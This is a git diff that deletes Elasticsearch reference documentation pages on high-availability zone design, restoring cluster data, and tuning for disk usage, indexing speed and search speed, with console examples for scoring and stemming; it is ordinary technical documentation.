resources and good -connectivity to the rest of the cluster. - -[[high-availability-cluster-design-three-zones]] -==== Clusters with three or more zones - -If you have three zones then you should have one master-eligible node in each -zone. If you have more than three zones then you should choose three of the -zones and put a master-eligible node in each of these three zones. This will -mean that the cluster can still elect a master even if one of the zones fails. - -As always, your indices should have at least one replica in case a node fails. -You should also use <> to -limit the number of copies of each shard in each zone. For instance, if you have -an index with one or two replicas configured then allocation awareness will -ensure that the replicas of the shard are in a different zone from the primary. -This means that a copy of every shard will still be available if one zone -fails. The availability of this shard will not be affected by such a -failure. - -[[high-availability-cluster-design-large-cluster-summary]] -==== Summary - -The cluster will be resilient to the loss of any zone as long as: - -- The <> is `green`. -- There are at least two zones containing data nodes. -- Every index has at least one replica of each shard, in addition to the - primary. -- Shard allocation awareness is configured to avoid concentrating all copies of - a shard within a single zone. -- The cluster has at least three master-eligible nodes. At least two of these - nodes are not voting-only master-eligible nodes, and they are spread evenly - across at least three zones. -- Clients are configured to send their requests to nodes in more than one zone - or are configured to use a load balancer that balances the requests across an - appropriate set of nodes. The {ess-trial}[Elastic Cloud] service provides such - a load balancer. diff --git a/docs/reference/high-availability/restore-cluster-data.asciidoc b/docs/reference/high-availability/restore-cluster-data.asciidoc deleted file mode 100644 index da58e8c4f3e..00000000000 --- a/docs/reference/high-availability/restore-cluster-data.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[restore-cluster-data]] -=== Restore a cluster's data -++++ -Restore the data -++++ - -include::../snapshot-restore/index.asciidoc[tag=restore-intro] - -[TIP] -==== -If your cluster has {es} {security-features} enabled, the restore API requires the `manage` cluster privilege. There is no bespoke role for the restore process. This privilege is very permissive and should only -be granted to users in the "administrator" category. Specifically, it allows -malicious users to exfiltrate data to a location of their choosing. Automated -tools should not run as users with this privilege. -==== diff --git a/docs/reference/how-to.asciidoc b/docs/reference/how-to.asciidoc deleted file mode 100644 index 8d11b947cc3..00000000000 --- a/docs/reference/how-to.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[how-to]] -= How To - -[partintro] --- -Elasticsearch ships with defaults which are intended to give a good out of -the box experience. Full text search, highlighting, aggregations, and indexing -should all just work without the user having to change anything. - -Once you better understand how you want to use Elasticsearch, however, -there are a number of optimizations you can make to improve performance -for your use case. - -This section provides guidance about which changes should and shouldn't be -made. --- - -include::how-to/general.asciidoc[] - -include::how-to/recipes.asciidoc[] - -include::how-to/indexing-speed.asciidoc[] - -include::how-to/search-speed.asciidoc[] - -include::how-to/disk-usage.asciidoc[] - -include::how-to/size-your-shards.asciidoc[] \ No newline at end of file diff --git a/docs/reference/how-to/disk-usage.asciidoc b/docs/reference/how-to/disk-usage.asciidoc deleted file mode 100644 index cac21e3080f..00000000000 --- a/docs/reference/how-to/disk-usage.asciidoc +++ /dev/null @@ -1,194 +0,0 @@ -[[tune-for-disk-usage]] -== Tune for disk usage - -[discrete] -=== Disable the features you do not need - -By default Elasticsearch indexes and adds doc values to most fields so that they -can be searched and aggregated out of the box. For instance if you have a numeric -field called `foo` that you need to run histograms on but that you never need to -filter on, you can safely disable indexing on this field in your -<>: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "integer", - "index": false - } - } - } -} --------------------------------------------------- - -<> fields store normalization factors in the index in order to be -able to score documents. If you only need matching capabilities on a `text` -field but do not care about the produced scores, you can configure Elasticsearch -to not write norms to the index: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "text", - "norms": false - } - } - } -} --------------------------------------------------- - -<> fields also store frequencies and positions in the index by -default. Frequencies are used to compute scores and positions are used to run -phrase queries. If you do not need to run phrase queries, you can tell -Elasticsearch to not index positions: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "text", - "index_options": "freqs" - } - } - } -} --------------------------------------------------- - -Furthermore if you do not care about scoring either, you can configure -Elasticsearch to just index matching documents for every term. You will -still be able to search on this field, but phrase queries will raise errors -and scoring will assume that terms appear only once in every document. - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "text", - "norms": false, - "index_options": "freqs" - } - } - } -} --------------------------------------------------- - -[discrete] -[[default-dynamic-string-mapping]] -=== Don't use default dynamic string mappings - -The default <> will index string fields -both as <> and <>. This is wasteful if you only -need one of them. Typically an `id` field will only need to be indexed as a -`keyword` while a `body` field will only need to be indexed as a `text` field. - -This can be disabled by either configuring explicit mappings on string fields -or setting up dynamic templates that will map string fields as either `text` -or `keyword`. - -For instance, here is a template that can be used in order to only map string -fields as `keyword`: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "dynamic_templates": [ - { - "strings": { - "match_mapping_type": "string", - "mapping": { - "type": "keyword" - } - } - } - ] - } -} --------------------------------------------------- - -[discrete] -=== Watch your shard size - -Larger shards are going to be more efficient at storing data. To increase the size of your shards, you can decrease the number of primary shards in an index by <> with fewer primary shards, creating fewer indices (e.g. by leveraging the <>), or modifying an existing index using the <>. - -Keep in mind that large shard sizes come with drawbacks, such as long full recovery times. - -[discrete] -[[disable-source]] -=== Disable `_source` - -The <> field stores the original JSON body of the document. If you don’t need access to it you can disable it. However, APIs that needs access to `_source` such as update and reindex won’t work. - -[discrete] -[[best-compression]] -=== Use `best_compression` - -The `_source` and stored fields can easily take a non negligible amount of disk -space. They can be compressed more aggressively by using the `best_compression` -<>. - -[discrete] -=== Force Merge - -Indices in Elasticsearch are stored in one or more shards. Each shard is a Lucene index and made up of one or more segments - the actual files on disk. Larger segments are more efficient for storing data. - -The <> can be used to reduce the number of segments per shard. In many cases, the number of segments can be reduced to one per shard by setting `max_num_segments=1`. - -[discrete] -=== Shrink Index - -The <> allows you to reduce the number of shards in an index. Together with the Force Merge API above, this can significantly reduce the number of shards and segments of an index. - -[discrete] -=== Use the smallest numeric type that is sufficient - -The type that you pick for <> can have a significant impact -on disk usage. In particular, integers should be stored using an integer type -(`byte`, `short`, `integer` or `long`) and floating points should either be -stored in a `scaled_float` if appropriate or in the smallest type that fits the -use-case: using `float` over `double`, or `half_float` over `float` will help -save storage. - -[discrete] -=== Use index sorting to colocate similar documents - -When Elasticsearch stores `_source`, it compresses multiple documents at once -in order to improve the overall compression ratio. For instance it is very -common that documents share the same field names, and quite common that they -share some field values, especially on fields that have a low cardinality or -a {wikipedia}/Zipf%27s_law[zipfian] distribution. - -By default documents are compressed together in the order that they are added -to the index. If you enabled <> -then instead they are compressed in sorted order. Sorting documents with similar -structure, fields, and values together should improve the compression ratio. - -[discrete] -=== Put fields in the same order in documents - -Due to the fact that multiple documents are compressed together into blocks, -it is more likely to find longer duplicate strings in those `_source` documents -if fields always occur in the same order. - -[discrete] -[[roll-up-historical-data]] -=== Roll up historical data - -Keeping older data can useful for later analysis but is often avoided due to -storage costs. You can use data rollups to summarize and store historical data -at a fraction of the raw data's storage cost. See <>. diff --git a/docs/reference/how-to/general.asciidoc b/docs/reference/how-to/general.asciidoc deleted file mode 100644 index 4a9331194d9..00000000000 --- a/docs/reference/how-to/general.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[general-recommendations]] -== General recommendations - -[discrete] -[[large-size]] -=== Don't return large result sets - -Elasticsearch is designed as a search engine, which makes it very good at -getting back the top documents that match a query. However, it is not as good -for workloads that fall into the database domain, such as retrieving all -documents that match a particular query. If you need to do this, make sure to -use the <> API. - -[discrete] -[[maximum-document-size]] -=== Avoid large documents - -Given that the default <> is set to -100MB, Elasticsearch will refuse to index any document that is larger than -that. You might decide to increase that particular setting, but Lucene still -has a limit of about 2GB. - -Even without considering hard limits, large documents are usually not -practical. Large documents put more stress on network, memory usage and disk, -even for search requests that do not request the `_source` since Elasticsearch -needs to fetch the `_id` of the document in all cases, and the cost of getting -this field is bigger for large documents due to how the filesystem cache works. -Indexing this document can use an amount of memory that is a multiplier of the -original size of the document. Proximity search (phrase queries for instance) -and <> also become more expensive -since their cost directly depends on the size of the original document. - -It is sometimes useful to reconsider what the unit of information should be. -For instance, the fact you want to make books searchable doesn't necessarily -mean that a document should consist of a whole book. It might be a better idea -to use chapters or even paragraphs as documents, and then have a property in -these documents that identifies which book they belong to. This does not only -avoid the issues with large documents, it also makes the search experience -better. For instance if a user searches for two words `foo` and `bar`, a match -across different chapters is probably very poor, while a match within the same -paragraph is likely good. - diff --git a/docs/reference/how-to/indexing-speed.asciidoc b/docs/reference/how-to/indexing-speed.asciidoc deleted file mode 100644 index 8da7bb199fd..00000000000 --- a/docs/reference/how-to/indexing-speed.asciidoc +++ /dev/null @@ -1,147 +0,0 @@ -[[tune-for-indexing-speed]] -== Tune for indexing speed - -[discrete] -=== Use bulk requests - -Bulk requests will yield much better performance than single-document index -requests. In order to know the optimal size of a bulk request, you should run -a benchmark on a single node with a single shard. First try to index 100 -documents at once, then 200, then 400, etc. doubling the number of documents -in a bulk request in every benchmark run. When the indexing speed starts to -plateau then you know you reached the optimal size of a bulk request for your -data. In case of tie, it is better to err in the direction of too few rather -than too many documents. Beware that too large bulk requests might put the -cluster under memory pressure when many of them are sent concurrently, so -it is advisable to avoid going beyond a couple tens of megabytes per request -even if larger requests seem to perform better. - -[discrete] -[[multiple-workers-threads]] -=== Use multiple workers/threads to send data to Elasticsearch - -A single thread sending bulk requests is unlikely to be able to max out the -indexing capacity of an Elasticsearch cluster. In order to use all resources -of the cluster, you should send data from multiple threads or processes. In -addition to making better use of the resources of the cluster, this should -help reduce the cost of each fsync. - -Make sure to watch for `TOO_MANY_REQUESTS (429)` response codes -(`EsRejectedExecutionException` with the Java client), which is the way that -Elasticsearch tells you that it cannot keep up with the current indexing rate. -When it happens, you should pause indexing a bit before trying again, ideally -with randomized exponential backoff. - -Similarly to sizing bulk requests, only testing can tell what the optimal -number of workers is. This can be tested by progressively increasing the -number of workers until either I/O or CPU is saturated on the cluster. - -[discrete] -=== Unset or increase the refresh interval - -The operation that consists of making changes visible to search - called a -<> - is costly, and calling it often while there is -ongoing indexing activity can hurt indexing speed. - -include::{es-repo-dir}/indices/refresh.asciidoc[tag=refresh-interval-default] -This is the optimal configuration if you have no or very little search traffic -(e.g. less than one search request every 5 minutes) and want to optimize for -indexing speed. This behavior aims to automatically optimize bulk indexing in -the default case when no searches are performed. In order to opt out of this -behavior set the refresh interval explicitly. - -On the other hand, if your index experiences regular search requests, this -default behavior means that Elasticsearch will refresh your index every 1 -second. If you can afford to increase the amount of time between when a document -gets indexed and when it becomes visible, increasing the -<> to a larger value, e.g. -`30s`, might help improve indexing speed. - -[discrete] -=== Disable replicas for initial loads - -If you have a large amount of data that you want to load all at once into -Elasticsearch, it may be beneficial to set `index.number_of_replicas` to `0` in -order to speed up indexing. Having no replicas means that losing a single node -may incur data loss, so it is important that the data lives elsewhere so that -this initial load can be retried in case of an issue. Once the initial load is -finished, you can set `index.number_of_replicas` back to its original value. - -If `index.refresh_interval` is configured in the index settings, it may further -help to unset it during this initial load and setting it back to its original -value once the initial load is finished. - -[discrete] -=== Disable swapping - -You should make sure that the operating system is not swapping out the java -process by <>. - -[discrete] -=== Give memory to the filesystem cache - -The filesystem cache will be used in order to buffer I/O operations. You should -make sure to give at least half the memory of the machine running Elasticsearch -to the filesystem cache. - -[discrete] -=== Use auto-generated ids - -When indexing a document that has an explicit id, Elasticsearch needs to check -whether a document with the same id already exists within the same shard, which -is a costly operation and gets even more costly as the index grows. By using -auto-generated ids, Elasticsearch can skip this check, which makes indexing -faster. - -[discrete] -=== Use faster hardware - -If indexing is I/O bound, you should investigate giving more memory to the -filesystem cache (see above) or buying faster drives. In particular SSD drives -are known to perform better than spinning disks. Always use local storage, -remote filesystems such as `NFS` or `SMB` should be avoided. Also beware of -virtualized storage such as Amazon's `Elastic Block Storage`. Virtualized -storage works very well with Elasticsearch, and it is appealing since it is so -fast and simple to set up, but it is also unfortunately inherently slower on an -ongoing basis when compared to dedicated local storage. If you put an index on -`EBS`, be sure to use provisioned IOPS otherwise operations could be quickly -throttled. - -Stripe your index across multiple SSDs by configuring a RAID 0 array. Remember -that it will increase the risk of failure since the failure of any one SSD -destroys the index. However this is typically the right tradeoff to make: -optimize single shards for maximum performance, and then add replicas across -different nodes so there's redundancy for any node failures. You can also use -<> to backup the index for further -insurance. - -[discrete] -=== Indexing buffer size - -If your node is doing only heavy indexing, be sure -<> is large enough to give -at most 512 MB indexing buffer per shard doing heavy indexing (beyond that -indexing performance does not typically improve). Elasticsearch takes that -setting (a percentage of the java heap or an absolute byte-size), and -uses it as a shared buffer across all active shards. Very active shards will -naturally use this buffer more than shards that are performing lightweight -indexing. - -The default is `10%` which is often plenty: for example, if you give the JVM -10GB of memory, it will give 1GB to the index buffer, which is enough to host -two shards that are heavily indexing. - -[discrete] -=== Use {ccr} to prevent searching from stealing resources from indexing - -Within a single cluster, indexing and searching can compete for resources. By -setting up two clusters, configuring <> to replicate data from -one cluster to the other one, and routing all searches to the cluster that has -the follower indices, search activity will no longer steal resources from -indexing on the cluster that hosts the leader indices. - -[discrete] -=== Additional optimizations - -Many of the strategies outlined in <> also -provide an improvement in the speed of indexing. diff --git a/docs/reference/how-to/recipes.asciidoc b/docs/reference/how-to/recipes.asciidoc deleted file mode 100644 index b46f624aef5..00000000000 --- a/docs/reference/how-to/recipes.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[recipes]] -== Recipes - -This section includes a few recipes to help with common problems: - -* <> -* <> -* <> - -include::recipes/stemming.asciidoc[] -include::recipes/scoring.asciidoc[] diff --git a/docs/reference/how-to/recipes/scoring.asciidoc b/docs/reference/how-to/recipes/scoring.asciidoc deleted file mode 100644 index 47a3622aabf..00000000000 --- a/docs/reference/how-to/recipes/scoring.asciidoc +++ /dev/null @@ -1,199 +0,0 @@ -[[consistent-scoring]] -=== Getting consistent scoring - -The fact that Elasticsearch operates with shards and replicas adds challenges -when it comes to having good scoring. - -[discrete] -==== Scores are not reproducible - -Say the same user runs the same request twice in a row and documents do not come -back in the same order both times, this is a pretty bad experience isn't it? -Unfortunately this is something that can happen if you have replicas -(`index.number_of_replicas` is greater than 0). The reason is that Elasticsearch -selects the shards that the query should go to in a round-robin fashion, so it -is quite likely if you run the same query twice in a row that it will go to -different copies of the same shard. - -Now why is it a problem? Index statistics are an important part of the score. -And these index statistics may be different across copies of the same shard -due to deleted documents. As you may know when documents are deleted or updated, -the old document is not immediately removed from the index, it is just marked -as deleted and it will only be removed from disk on the next time that the -segment this old document belongs to is merged. However for practical reasons, -those deleted documents are taken into account for index statistics. So imagine -that the primary shard just finished a large merge that removed lots of deleted -documents, then it might have index statistics that are sufficiently different -from the replica (which still have plenty of deleted documents) so that scores -are different too. - -The recommended way to work around this issue is to use a string that identifies -the user that is logged in (a user id or session id for instance) as a -<>. This ensures that all queries of a -given user are always going to hit the same shards, so scores remain more -consistent across queries. - -This work around has another benefit: when two documents have the same score, -they will be sorted by their internal Lucene doc id (which is unrelated to the -`_id`) by default. However these doc ids could be different across copies of -the same shard. So by always hitting the same shard, we would get more -consistent ordering of documents that have the same scores. - -[discrete] -==== Relevancy looks wrong - -If you notice that two documents with the same content get different scores or -that an exact match is not ranked first, then the issue might be related to -sharding. By default, Elasticsearch makes each shard responsible for producing -its own scores. However since index statistics are an important contributor to -the scores, this only works well if shards have similar index statistics. The -assumption is that since documents are routed evenly to shards by default, then -index statistics should be very similar and scoring would work as expected. -However in the event that you either: - - - use routing at index time, - - query multiple _indices_, - - or have too little data in your index - -then there are good chances that all shards that are involved in the search -request do not have similar index statistics and relevancy could be bad. - -If you have a small dataset, the easiest way to work around this issue is to -index everything into an index that has a single shard -(`index.number_of_shards: 1`), which is the default. Then index statistics -will be the same for all documents and scores will be consistent. - -Otherwise the recommended way to work around this issue is to use the -<> search type. This will make -Elasticsearch perform an initial round trip to all involved shards, asking -them for their index statistics relatively to the query, then the coordinating -node will merge those statistics and send the merged statistics alongside the -request when asking shards to perform the `query` phase, so that shards can -use these global statistics rather than their own statistics in order to do the -scoring. - -In most cases, this additional round trip should be very cheap. However in the -event that your query contains a very large number of fields/terms or fuzzy -queries, beware that gathering statistics alone might not be cheap since all -terms have to be looked up in the terms dictionaries in order to look up -statistics. - -[[static-scoring-signals]] -=== Incorporating static relevance signals into the score - -Many domains have static signals that are known to be correlated with relevance. -For instance {wikipedia}/PageRank[PageRank] and url length are -two commonly used features for web search in order to tune the score of web -pages independently of the query. - -There are two main queries that allow combining static score contributions with -textual relevance, eg. as computed with BM25: - - <> - - <> - -For instance imagine that you have a `pagerank` field that you wish to -combine with the BM25 score so that the final score is equal to -`score = bm25_score + pagerank / (10 + pagerank)`. - -With the <> the query would -look like this: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "body": { - "type": "text" - }, - "pagerank": { - "type": "long" - } - } - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "script_score": { - "query": { - "match": { "body": "elasticsearch" } - }, - "script": { - "source": "_score * saturation(doc['pagerank'].value, 10)" <1> - } - } - } -} --------------------------------------------------- -//TEST[continued] - -<1> `pagerank` must be mapped as a <> - -while with the <> it would -look like below: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "body": { - "type": "text" - }, - "pagerank": { - "type": "rank_feature" - } - } - } -} --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -GET _search -{ - "query": { - "bool": { - "must": { - "match": { "body": "elasticsearch" } - }, - "should": { - "rank_feature": { - "field": "pagerank", <1> - "saturation": { - "pivot": 10 - } - } - } - } - } -} --------------------------------------------------- - -<1> `pagerank` must be mapped as a <> field - -While both options would return similar scores, there are trade-offs: -<> provides a lot of flexibility, -enabling you to combine the text relevance score with static signals as you -prefer. On the other hand, the <> only -exposes a couple ways to incorporate static signails into the score. However, -it relies on the <> and -<> fields, which index values in a special way -that allows the <> to skip -over non-competitive documents and get the top matches of a query faster. diff --git a/docs/reference/how-to/recipes/stemming.asciidoc b/docs/reference/how-to/recipes/stemming.asciidoc deleted file mode 100644 index 462998c82b3..00000000000 --- a/docs/reference/how-to/recipes/stemming.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[mixing-exact-search-with-stemming]] -=== Mixing exact search with stemming - -When building a search application, stemming is often a must as it is desirable -for a query on `skiing` to match documents that contain `ski` or `skis`. But -what if a user wants to search for `skiing` specifically? The typical way to do -this would be to use a <> in order to have the same -content indexed in two different ways: - -[source,console] --------------------------------------------------- -PUT index -{ - "settings": { - "analysis": { - "analyzer": { - "english_exact": { - "tokenizer": "standard", - "filter": [ - "lowercase" - ] - } - } - } - }, - "mappings": { - "properties": { - "body": { - "type": "text", - "analyzer": "english", - "fields": { - "exact": { - "type": "text", - "analyzer": "english_exact" - } - } - } - } - } -} - -PUT index/_doc/1 -{ - "body": "Ski resort" -} - -PUT index/_doc/2 -{ - "body": "A pair of skis" -} - -POST index/_refresh --------------------------------------------------- - -With such a setup, searching for `ski` on `body` would return both documents: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "simple_query_string": { - "fields": [ "body" ], - "query": "ski" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 2, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 2, - "relation": "eq" - }, - "max_score": 0.18232156, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.18232156, - "_source": { - "body": "Ski resort" - } - }, - { - "_index": "index", - "_type": "_doc", - "_id": "2", - "_score": 0.18232156, - "_source": { - "body": "A pair of skis" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] - -On the other hand, searching for `ski` on `body.exact` would only return -document `1` since the analysis chain of `body.exact` does not perform -stemming. - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "simple_query_string": { - "fields": [ "body.exact" ], - "query": "ski" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 1, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.8025915, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.8025915, - "_source": { - "body": "Ski resort" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 1,/"took": "$body.took",/] - -This is not something that is easy to expose to end users, as we would need to -have a way to figure out whether they are looking for an exact match or not and -redirect to the appropriate field accordingly. Also what to do if only parts of -the query need to be matched exactly while other parts should still take -stemming into account? - -Fortunately, the `query_string` and `simple_query_string` queries have a feature -that solves this exact problem: `quote_field_suffix`. This tells Elasticsearch -that the words that appear in between quotes are to be redirected to a different -field, see below: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "simple_query_string": { - "fields": [ "body" ], - "quote_field_suffix": ".exact", - "query": "\"ski\"" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 2, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.8025915, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.8025915, - "_source": { - "body": "Ski resort" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] - -In the above case, since `ski` was in-between quotes, it was searched on the -`body.exact` field due to the `quote_field_suffix` parameter, so only document -`1` matched. This allows users to mix exact search with stemmed search as they -like. - -NOTE: If the choice of field passed in `quote_field_suffix` does not exist -the search will fall back to using the default field for the query string. diff --git a/docs/reference/how-to/search-speed.asciidoc b/docs/reference/how-to/search-speed.asciidoc deleted file mode 100644 index e51c7fa2b78..00000000000 --- a/docs/reference/how-to/search-speed.asciidoc +++ /dev/null @@ -1,536 +0,0 @@ -[[tune-for-search-speed]] -== Tune for search speed - -[discrete] -=== Give memory to the filesystem cache - -Elasticsearch heavily relies on the filesystem cache in order to make search -fast. In general, you should make sure that at least half the available memory -goes to the filesystem cache so that Elasticsearch can keep hot regions of the -index in physical memory. - -[discrete] -=== Use faster hardware - -If your search is I/O bound, you should investigate giving more memory to the -filesystem cache (see above) or buying faster drives. In particular SSD drives -are known to perform better than spinning disks. Always use local storage, -remote filesystems such as `NFS` or `SMB` should be avoided. Also beware of -virtualized storage such as Amazon's `Elastic Block Storage`. Virtualized -storage works very well with Elasticsearch, and it is appealing since it is so -fast and simple to set up, but it is also unfortunately inherently slower on an -ongoing basis when compared to dedicated local storage. If you put an index on -`EBS`, be sure to use provisioned IOPS otherwise operations could be quickly -throttled. - -If your search is CPU-bound, you should investigate buying faster CPUs. - -[discrete] -=== Document modeling - -Documents should be modeled so that search-time operations are as cheap as possible. - -In particular, joins should be avoided. <> can make queries -several times slower and <> relations can make -queries hundreds of times slower. So if the same questions can be answered without -joins by denormalizing documents, significant speedups can be expected. - -[discrete] -[[search-as-few-fields-as-possible]] -=== Search as few fields as possible - -The more fields a <> or -<> query targets, the slower it is. -A common technique to improve search speed over multiple fields is to copy -their values into a single field at index time, and then use this field at -search time. This can be automated with the <> directive of -mappings without having to change the source of documents. Here is an example -of an index containing movies that optimizes queries that search over both the -name and the plot of the movie by indexing both values into the `name_and_plot` -field. - -[source,console] --------------------------------------------------- -PUT movies -{ - "mappings": { - "properties": { - "name_and_plot": { - "type": "text" - }, - "name": { - "type": "text", - "copy_to": "name_and_plot" - }, - "plot": { - "type": "text", - "copy_to": "name_and_plot" - } - } - } -} --------------------------------------------------- - -[discrete] -=== Pre-index data - -You should leverage patterns in your queries to optimize the way data is indexed. -For instance, if all your documents have a `price` field and most queries run -<> aggregations on a fixed -list of ranges, you could make this aggregation faster by pre-indexing the ranges -into the index and using a <> -aggregations. - -For instance, if documents look like: - -[source,console] --------------------------------------------------- -PUT index/_doc/1 -{ - "designation": "spoon", - "price": 13 -} --------------------------------------------------- - -and search requests look like: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "ranges": [ - { "to": 10 }, - { "from": 10, "to": 100 }, - { "from": 100 } - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Then documents could be enriched by a `price_range` field at index time, which -should be mapped as a <>: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "price_range": { - "type": "keyword" - } - } - } -} - -PUT index/_doc/1 -{ - "designation": "spoon", - "price": 13, - "price_range": "10-100" -} --------------------------------------------------- - -And then search requests could aggregate this new field rather than running a -`range` aggregation on the `price` field. - -[source,console] --------------------------------------------------- -GET index/_search -{ - "aggs": { - "price_ranges": { - "terms": { - "field": "price_range" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -[[map-ids-as-keyword]] -=== Consider mapping identifiers as `keyword` - -include::../mapping/types/numeric.asciidoc[tag=map-ids-as-keyword] - -[discrete] -=== Avoid scripts - -If possible, avoid using <> or -<> in searches. See -<>. - - -[discrete] -=== Search rounded dates - -Queries on date fields that use `now` are typically not cacheable since the -range that is being matched changes all the time. However switching to a -rounded date is often acceptable in terms of user experience, and has the -benefit of making better use of the query cache. - -For instance the below query: - -[source,console] --------------------------------------------------- -PUT index/_doc/1 -{ - "my_date": "2016-05-11T16:30:55.328Z" -} - -GET index/_search -{ - "query": { - "constant_score": { - "filter": { - "range": { - "my_date": { - "gte": "now-1h", - "lte": "now" - } - } - } - } - } -} --------------------------------------------------- - -could be replaced with the following query: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "constant_score": { - "filter": { - "range": { - "my_date": { - "gte": "now-1h/m", - "lte": "now/m" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -In that case we rounded to the minute, so if the current time is `16:31:29`, -the range query will match everything whose value of the `my_date` field is -between `15:31:00` and `16:31:59`. And if several users run a query that -contains this range in the same minute, the query cache could help speed things -up a bit. The longer the interval that is used for rounding, the more the query -cache can help, but beware that too aggressive rounding might also hurt user -experience. - - -NOTE: It might be tempting to split ranges into a large cacheable part and -smaller not cacheable parts in order to be able to leverage the query cache, -as shown below: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "constant_score": { - "filter": { - "bool": { - "should": [ - { - "range": { - "my_date": { - "gte": "now-1h", - "lte": "now-1h/m" - } - } - }, - { - "range": { - "my_date": { - "gt": "now-1h/m", - "lt": "now/m" - } - } - }, - { - "range": { - "my_date": { - "gte": "now/m", - "lte": "now" - } - } - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -However such practice might make the query run slower in some cases since the -overhead introduced by the `bool` query may defeat the savings from better -leveraging the query cache. - -[discrete] -=== Force-merge read-only indices - -Indices that are read-only may benefit from being <>. This is typically the case with time-based indices: -only the index for the current time frame is getting new documents while older -indices are read-only. Shards that have been force-merged into a single segment -can use simpler and more efficient data structures to perform searches. - -IMPORTANT: Do not force-merge indices to which you are still writing, or to -which you will write again in the future. Instead, rely on the automatic -background merge process to perform merges as needed to keep the index running -smoothly. If you continue to write to a force-merged index then its performance -may become much worse. - -[discrete] -=== Warm up global ordinals - -<> are a data structure that is used to -optimize the performance of aggregations. They are calculated lazily and stored in -the JVM heap as part of the <>. For fields -that are heavily used for bucketing aggregations, you can tell {es} to construct -and cache the global ordinals before requests are received. This should be done -carefully because it will increase heap usage and can make <> -take longer. The option can be updated dynamically on an existing mapping by -setting the <> mapping parameter: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "keyword", - "eager_global_ordinals": true - } - } - } -} --------------------------------------------------- - -[discrete] -=== Warm up the filesystem cache - -If the machine running Elasticsearch is restarted, the filesystem cache will be -empty, so it will take some time before the operating system loads hot regions -of the index into memory so that search operations are fast. You can explicitly -tell the operating system which files should be loaded into memory eagerly -depending on the file extension using the -<> setting. - -WARNING: Loading data into the filesystem cache eagerly on too many indices or -too many files will make search _slower_ if the filesystem cache is not large -enough to hold all the data. Use with caution. - -[discrete] -=== Use index sorting to speed up conjunctions - -<> can be useful in order to make -conjunctions faster at the cost of slightly slower indexing. Read more about it -in the <>. - -[discrete] -[[preference-cache-optimization]] -=== Use `preference` to optimize cache utilization - -There are multiple caches that can help with search performance, such as the -{wikipedia}/Page_cache[filesystem cache], the -<> or the <>. Yet -all these caches are maintained at the node level, meaning that if you run the -same request twice in a row, have 1 <> or more -and use {wikipedia}/Round-robin_DNS[round-robin], the default -routing algorithm, then those two requests will go to different shard copies, -preventing node-level caches from helping. - -Since it is common for users of a search application to run similar requests -one after another, for instance in order to analyze a narrower subset of the -index, using a preference value that identifies the current user or session -could help optimize usage of the caches. - -[discrete] -=== Replicas might help with throughput, but not always - -In addition to improving resiliency, replicas can help improve throughput. For -instance if you have a single-shard index and three nodes, you will need to -set the number of replicas to 2 in order to have 3 copies of your shard in -total so that all nodes are utilized. - -Now imagine that you have a 2-shards index and two nodes. In one case, the -number of replicas is 0, meaning that each node holds a single shard. In the -second case the number of replicas is 1, meaning that each node has two shards. -Which setup is going to perform best in terms of search performance? Usually, -the setup that has fewer shards per node in total will perform better. The -reason for that is that it gives a greater share of the available filesystem -cache to each shard, and the filesystem cache is probably Elasticsearch's -number 1 performance factor. At the same time, beware that a setup that does -not have replicas is subject to failure in case of a single node failure, so -there is a trade-off between throughput and availability. - -So what is the right number of replicas? If you have a cluster that has -`num_nodes` nodes, `num_primaries` primary shards _in total_ and if you want to -be able to cope with `max_failures` node failures at once at most, then the -right number of 